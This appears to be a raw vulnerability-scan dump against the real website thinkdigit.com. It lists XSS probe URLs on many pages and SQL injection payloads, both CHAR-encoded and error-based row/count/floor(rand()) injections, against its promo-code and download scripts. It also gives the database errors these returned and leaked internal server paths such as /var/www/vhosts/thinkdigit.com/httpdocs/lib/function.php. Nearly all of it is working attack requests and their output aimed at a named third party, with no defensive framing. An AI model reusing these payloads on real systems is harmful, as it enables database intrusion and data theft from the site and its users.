XSS http://www.thinkdigit.com/download.php?'"--> http://www.thinkdigit.com/technology-news.html?'"--> http://www.thinkdigit.com/cart.php?'"--> http://www.thinkdigit.com/feature.php?'"--> http://www.thinkdigit.com/Laptops-and-PCs-ca-31.php?'"--> http://www.thinkdigit.com/Mobiles-and-PDAs-ca-32.php?'"--> http://www.thinkdigit.com/review.php?'"--> http://www.thinkdigit.com/Audio-Devices-ca-34.php?'"--> http://www.thinkdigit.com/Storage-ca-38.php?'"--> http://www.thinkdigit.com/videos/mobiles-and-pdas/nokia-c2-03-a-dual-sim-phone-with-touch-and-type-delight-427.html?'"--> Database Error http://www.thinkdigit.com/check_valid_promocode_subscription.php?pcode='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 http://www.thinkdigit.com/check_valid_promocode_subscription.php?pcode='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' Warning: mysql_query() [function.mysql-query]: Unable to save result set in /var/www/vhosts/thinkdigit.com/httpdocs/check_valid_promocode_subscription.php on line 22 Duplicate entry '_!@4dilemma:1' for key 'group_key' Internal Path Leakage http://www.thinkdigit.com/aboutus.php Identified Internal Path(s): /var/www/vhosts/thinkdigit.com/httpdocs/libs/Smarty.class.php http://www.thinkdigit.com/forum/tutorials/143244-block-unwanted-ads-all-applications.html Identified Internal Path(s): /etc/hosts http://www.thinkdigit.com/newsletter.php Identified Internal Path(s): /var/www/vhosts/thinkdigit.com/httpdocs/lib/function.php http://www.thinkdigit.com/review.php/page/image/ Identified Internal Path(s): /var/www/vhosts/thinkdigit.com/httpdocs/review.php http://www.thinkdigit.com/download.php?platform_id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+ Identified Internal Path(s): /var/www/vhosts/thinkdigit.com/httpdocs/lib/function.php